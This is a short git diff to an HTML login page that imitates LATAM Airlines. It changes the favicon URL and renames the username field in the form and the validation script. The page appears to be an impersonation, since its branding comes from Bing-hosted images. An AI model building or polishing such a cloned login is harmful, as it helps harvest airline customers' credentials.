--- a/index.html
+++ b/index.html
@@ -4,9 +4,9 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Faça seu Login | LATAM AIRLINES</title>
-    <link rel="icon" href="https://th.bing.com/th/id/OIP.pawmiYLYxeNk4mrlvyIlqAHaL4?
+    <link rel="icon" href="https://th.bing.com/th/id/R.a5ac268982d8c5e364e26ae5bf2225a8?
 
-rs=1&pid=ImgDetMain">
+rik=BdgmKlyYGtyqig&pid=ImgRaw&r=0">
     <style>
         body {
             font-family: Arial, sans-serif;
@@ -75,7 +75,7 @@ center center fixed;
     <script>
         function validateForm(event) {
             event.preventDefault();
-            var username = document.forms["loginForm"]["alias"].value;
+            var username = document.forms["loginForm"]["username"].value;
             var password = document.forms["loginForm"]["password"].value;
             var errorMessage = document.getElementById("error-message");
 
@@ -104,7 +104,7 @@ rik=9EVDOKvltMk8Kg&riu=http%3a%2f%2flogos-download.com%2fwp-content%2fuploads
 
 seus dados:</p>
             <div id="error-message" class="error-message"></div>
-            <input type="text" name="alias" placeholder="Email, CPF ou Número de 
+            <input type="text" name="username" placeholder="Email, CPF ou Número de 
 
 cliente">
             <input type="password" name="password" placeholder="Senha">
